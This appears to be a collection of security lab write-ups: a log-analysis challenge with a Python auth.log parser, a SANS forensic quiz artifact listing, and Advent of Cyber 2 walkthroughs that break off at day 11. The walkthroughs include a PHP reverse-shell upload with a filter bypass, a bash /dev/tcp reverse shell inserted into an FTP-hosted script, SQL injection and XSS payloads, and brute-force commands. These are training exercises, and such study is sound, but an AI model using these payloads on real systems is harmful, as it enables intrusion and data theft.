Hammered (Log Analysis)

https://cyberdefenders.org/labs/42

Contents
- Initial Analysis
- Initial Findings
- Manipulating the Logs
  - auth.log - sorted by command then time
  - auth.log - all unique lines sorted by command (excluding timestamp)
  - auth.log - extract commands
  - auth.log - extract IPs
  - www-access.log - extract IPs
  - www-access.log - extract user agents
- Questions
  - #1 Which service did the attackers use to gain access to the system?
  - #2 What is the operating system version of the targeted system? (one word)
  - #3 What is the name of the compromised account?
  - #4
  - #5 Consider that each unique IP represents a different attacker. How many attackers were able to get access to the system?
  - #6 Which attacker's IP address successfully logged into the system the most number of times?
  - #7 How many requests were sent to the Apache server?
  - #8 How many rules have been added to the firewall?
  - #9 One of the files downloaded to the target system is a scanning tool. Provide the tool name.
  - #10 When was the last login from the attacker with IP 219.150.161.20?
  - #11 The database displayed two warning messages; provide the most important and dangerous one.
  - #12 Multiple accounts were created on the target system. Which one was created on Apr 26 04:43:15?
  - #13 A few attackers were using a proxy to run their scans. What is the corresponding user-agent used by this proxy?
- Failures

Initial Analysis

When we first unzip the archive, we get a large number of files. The challenge description says there are only five files (although apache2 is a folder containing three files, so seven in total); however, I found that some answers are not in those seven files, so we need to consider all the files in the archive. Most answers, though, are in those primary five/seven.
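As an added example (not part of the original write-up), this is the kind of auth.log parsing the "extract IPs" step above leads to: it tallies sshd password outcomes per source IP, treats each unique IP as one attacker the way question #5 does, reports which IP logged in successfully most often and when a given IP last logged in. The log excerpt, host name, user names and IP addresses are constructed placeholders, not the lab's data.

```python
import re
from collections import Counter

# Constructed sample auth.log excerpt (placeholder host, users and IPs; not the lab's data).
SAMPLE_AUTH_LOG = """\
Apr 26 04:40:01 app-1 sshd[1001]: Failed password for root from 203.0.113.7 port 41022 ssh2
Apr 26 04:40:03 app-1 sshd[1001]: Failed password for root from 203.0.113.7 port 41022 ssh2
Apr 26 04:41:10 app-1 sshd[1002]: Accepted password for root from 203.0.113.7 port 41030 ssh2
Apr 26 04:42:55 app-1 sshd[1003]: Accepted password for root from 198.51.100.9 port 52201 ssh2
Apr 26 04:44:20 app-1 useradd[1010]: new user: name=newuser1, UID=1002, GID=1002, home=/home/newuser1, shell=/bin/bash
Apr 26 04:45:00 app-1 sshd[1004]: Accepted password for root from 203.0.113.7 port 41077 ssh2
Apr 26 04:47:31 app-1 sshd[1005]: Failed password for invalid user admin from 192.0.2.44 port 50010 ssh2
Apr 26 04:50:12 app-1 sshd[1006]: Accepted password for newuser1 from 198.51.100.9 port 52300 ssh2
Apr 26 04:52:00 app-1 sshd[1007]: Accepted password for root from 203.0.113.7 port 41101 ssh2
"""

# One sshd password event: syslog timestamp, outcome, user name, source IP.
SSH_EVENT_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)

def ssh_events(log_text):
    """Yield (timestamp, result, user, ip) for every sshd password line; other lines are skipped."""
    for line in log_text.splitlines():
        m = SSH_EVENT_RE.match(line)
        if m:
            yield m.group("ts"), m.group("result"), m.group("user"), m.group("ip")

def logins_by_ip(log_text, result="Accepted"):
    """Count sshd events with the given outcome per source IP (each unique IP = one attacker)."""
    return Counter(ip for _, res, _, ip in ssh_events(log_text) if res == result)

def attacker_count(log_text):
    """Number of distinct IPs that achieved at least one successful login."""
    return len(logins_by_ip(log_text))

def most_active_ip(log_text):
    """(ip, count) for the IP with the most successful logins, or None if there were none."""
    counts = logins_by_ip(log_text)
    return counts.most_common(1)[0] if counts else None

def last_login_from(log_text, ip):
    """Timestamp string of the last successful login from ip, or None if it never got in."""
    stamps = [ts for ts, res, _, src in ssh_events(log_text) if res == "Accepted" and src == ip]
    return stamps[-1] if stamps else None
```

To run it against the lab's own file, pass the contents of auth.log instead of SAMPLE_AUTH_LOG; failed attempts are available with logins_by_ip(text, "Failed") so brute-force noise can be compared with actual access.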

SANS April 2021 Forensic Quiz

https://isc.sans.edu/forums/diary/April+2021+Forensic+Quiz/27266/

Contents
- Introduction
- Artifacts
  - Excel-related
  - Executables and DLLs
  - Scheduled Task
- Pcaps
  - Export objects
  - Traffic Summary
- SHAs

Introduction

We're provided with a .pcap and a bunch of artifacts (files). The AD environment, we're told, is as follows:
- LAN segment range: 192.168.5.0/24 (192.168.5.0 through 192.168.5.255)
- Domain: clockwater.net
- Domain Controller: 192.168.5.5 - Clockwater-DC
- LAN segment gateway: 192.168.5.1
- LAN segment broadcast address: 192.168.5.255

Artifacts

First, let's inspect the artifacts.

```
$ find . -type f -exec ls -l -- {} +
242176 Mar 29 23:22 ./ProgramData/huqvg/huqvg.exe
49152 Mar 29 23:18 ./Users/Public/4123.do1
65545 Mar 29 23:22 ./Users/Public/4123.xlsb
65545 Mar 29 23:21 ./Users/Public/4123.xsg
299520 Mar 29 23:58 ./Users/wilmer.coughlin/AppData/Local/Temp/C618.tmp.dll
181413 Mar 29 23:17 ./Users/wilmer.coughlin/Downloads/subscription_1617056233.xlsb
4326 Mar 31 18:19 './Windows/System32/Tasks/Sun SvcRestartTask#32640'
251904 Mar 30 00:07 ./Windows/Temp/adf/anchorAsjuster_x64.exe
347648 Mar 30 00:08 ./Windows/Temp/adf/anchorDNS_x64.exe
347648 Mar 30 03:31 ./Windows/Temp/adf/anchor_x64.exe

$ find . -type f -exec file -- {} +
./Users/wilmer.coughlin/Downloads/subscription_1617056233.xlsb: Microsoft Excel 2007+
./Users/wilmer.coughlin/AppData/Local/Temp/C618.tmp.dll: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
./Users/Public/4123.xsg: ASCII text, with very long lines, with CRLF line terminators
./Users/Public/4123.xlsb: ASCII text, with very long lines, with CRLF line terminators
./Users/Public/4123.do1: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
./Windows/System32/Tasks/Sun SvcRestartTask#32640: XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
./Windows/Temp/adf/anchorDNS_x64.exe: PE32+ executable (GUI) x86-64, for MS Windows
./Windows/Temp/adf/anchorAsjuster_x64.exe: PE32+ executable (console) x86-64, for MS Windows
./Windows/Temp/adf/anchor_x64.exe: PE32+ executable (GUI) x86-64, for MS Windows
./ProgramData/huqvg/huqvg.exe: PE32+ executable (GUI) x86-64, for MS Windows

$ find . -type f -exec sha256sum -- {} +
ae6dbc08e0e21b217352175f916cfd5269c4fd8d5de6bff2d0a93a366f78e8d1 ./Users/wilmer.coughlin/Downloads/subscription_1617056233.xlsb
cc74f7e82eb33a14ffdea343a8975d8a81be151ffcb753cb3f3be10242c8a252 ./Users/wilmer.coughlin/AppData/Local/Temp/C618.tmp.dll
92bb3324b68e8780d718ed808cb9633dc1ef1f7988d2b85cc0f9f431ed63a63d ./Users/Public/4123.xsg
92bb3324b68e8780d718ed808cb9633dc1ef1f7988d2b85cc0f9f431ed63a63d ./Users/Public/4123.xlsb
93cc5e6a6b671d9b0124ade32ae8b09269de9f03c5c5e66347fbfc7a8c3b305e ./Users/Public/4123.do1
6b7de7ab79ef0f15d7c03536ad6403e317ae5712898957e0ae2ba6f41bf89828 ./Windows/System32/Tasks/Sun SvcRestartTask#32640
9fdbd76141ec43b6867f091a2dca503edb2a85e4b98a4500611f5fe484109513 ./Windows/Temp/adf/anchorDNS_x64.exe
3ab8a1ee10bd1b720e1c8a8795e78cdc09fec73a6bb91526c0ccd2dc2cfbc28d ./Windows/Temp/adf/anchorAsjuster_x64.exe
a8a8c66b155fcf9bfdf34ba0aca98991440c3d34b8a597c3fdebc8da251c9634 ./Windows/Temp/adf/anchor_x64.exe
291c573996c647508544e8e21bd2764e6e4c834d53d6d2c8903a0001c783764b ./ProgramData/huqvg/huqvg.exe
```

It looks like we have some executables, some Excel-related files, a .dll, and a scheduled task in XML format.

Advent of Cyber 2

The first 23 days are simple bullet points describing how to do the task. Day 24 is a more complete write-up, as it was a more complete challenge!

Table of Contents
- [Day 1] Web Exploitation: A Christmas Crisis [encoding]
- [Day 2] Web Exploitation: The Elf Strikes Back! [file upload]
- [Day 3] Web Exploitation: Christmas Chaos [brute force]
- [Day 4] Web Exploitation: Santa's watching [brute force / fuzzing]
- [Day 5] Web Exploitation: Someone stole Santa's gift list! [SQLi]
- [Day 6] Web Exploitation: Be careful with what you wish on a Christmas night [XSS]
- [Day 7] Networking: The Grinch Really Did Steal Christmas [pcap]
- [Day 8] Networking: What's Under the Christmas Tree? [nmap]
- [Day 9] Networking: Anyone can be Santa! [ftp]
- [Day 10] Networking: Don't be sElfish! [Samba]
- [Day 11] Networking: The Rogue Gnome [SUID]
- [Day 12] Networking: Ready, set, elf. [msf]
- [Day 13] Special by John Hammond: Coal for Christmas [manual exploit]
- [Day 14] Special by TheCyberMentor: Where's Rudolph? [OSINT]
- [Day 15] Scripting: There's a Python in my stocking! [Python]
- [Day 16] Scripting: Help! Where is Santa? [Python]
- [Day 17] Reverse Engineering: ReverseELFneering [RE x86]
- [Day 18] Reverse Engineering: The Bits of Christmas [RE .NET]
- [Day 19] Special by Tib3rius: The Naughty or Nice List [SSRF]
- [Day 20] Blue Teaming: PowershELlF to the rescue [PowerShell]
- [Day 21] Blue Teaming: Time for some ELForensics [strings, ADS, wmic]
- [Day 22] Blue Teaming: Elf McEager becomes CyberElf [CyberChef]
- [Day 23] Blue Teaming: The Grinch strikes again! [vss]
- [Day 24] Special by DarkStar: The Trial Before Christmas [lots!]

[Day 1] Web Exploitation: A Christmas Crisis [encoding]
- Register and log in
- Check cookies
- Decode using CyberChef
- All numbers and early-in-the-alphabet letters → hex
- Recognise format
- Adjust username and re-encode using CyberChef
- Replace cookie value and refresh page
- Turn everything on → success!

[Day 2] Web Exploitation: The Elf Strikes Back! [file upload]
- Create exploit script as described
- Go to URL including GET request http://<url>/?id=<id-token>
- Check source code for upload types
- Rename script to bypass filter: $ mv php-reverse-shell.php php-reverse-shell.jpg.php
- Upload file. Simple message "File received successfully!"
- Check Burp Suite history - the POST was to /upload, so perhaps /uploads/? Test: http://10.10.35.237/uploads/ → success!
- Also checked page source, found http://10.10.35.237/assets/js/upload.js. It's obfuscated, so use https://beautifier.io/ and http://jsnice.org/ to make sense of it. However, it doesn't seem to give much. Hints suggest using a directory brute-forcer.
- Set up netcat listener: $ sudo nc -lvnp 443
- Click file from http://10.10.35.237/uploads/, or visit full URL http://10.10.35.237/uploads/php-reverse-shell.jpg.php
- Check netcat, find shell: sh-4.4$ cat /var/www/flag.txt → success!

[Day 3] Web Exploitation: Christmas Chaos [brute force]
- Follow instructions to use Burp Suite to crack
- Intercept login
- Send to Intruder
- Cluster Bomb
- Set Payloads
- Attack
- One result has a different length returned → success!

[Day 4] Web Exploitation: Santa's watching [brute force / fuzzing]
- wfuzz -c -z file,big.txt http://shibes.xyz/api.php?breed=FUZZ
- $ gobuster dir -u http://10.10.176.185/ -w /usr/share/wordlists/dirb/common.txt -x php
- Found /api, which led to http://10.10.176.185/api/site-log.php → success!
- $ wfuzz -c -z file,wordlist http://10.10.176.185/api/site-log.php?date=FUZZ (wordlist downloaded from THM). Only one had any characters → success!

[Day 5] Web Exploitation: Someone stole Santa's gift list! [SQLi]
- Find login page. Not /login or /login.php. Nothing in source. Check hint.
- Attempt login using Burp Suite browser, find POST in HTTP history and send to Repeater, then save as panel_login.
- $ sqlmap -r panel_login --batch
- Meanwhile, try the obvious SQLi: santa:' or 1=1 -- → success!
- Try the same ' or 1=1 -- in the panel → success!
- Save the gift database POST request (as above) as gift_db
- $ sqlmap -r gift_db --batch --dump → success!

[Day 6] Web Exploitation: Be careful with what you wish on a Christmas night [XSS]
- Run manual test: add wish of <script>alert('xss');</script>, refresh page, get alert box → XSS
- Use ZAP Automated Scan as suggested

[Day 7] Networking: The Grinch Really Did Steal Christmas [pcap]
- ICMP to view pings
- http.request.method == GET to view HTTP GETs
- frame contains password to find the FTP cleartext password
- Export objects to find the wishlist

[Day 8] Networking: What's Under the Christmas Tree? [nmap]
- $ sudo nmap -A 10.10.27.82 -T4 -v → success!

[Day 9] Networking: Anyone can be Santa! [ftp]
- $ ftp 10.10.222.6 → anonymous
- ftp> ls -la to view current directory contents
- ftp> cd public then view current directory contents
- ftp> get shoppinglist.txt to download the file, then view it with $ cat
- ftp> get backup.sh then edit to include bash -i >& /dev/tcp/10.4.5.126/4242 0>&1
- $ nc -lvnp 4242 then wait for shell
- root@tbfc-ftp-01:~# cat /root/flag.txt → success!

[Day 10] Networking: Don't be sElfish! [Samba]
- $ enum4linux -a 10.10.122.80 to see what's available
- $ smbclient //10.10.122.80/tbfc-santa to access share (no password)

[Day 11] Networking: The Rogue Gnome [SUID]
- find / -perm -u=s -type f 2>/dev/null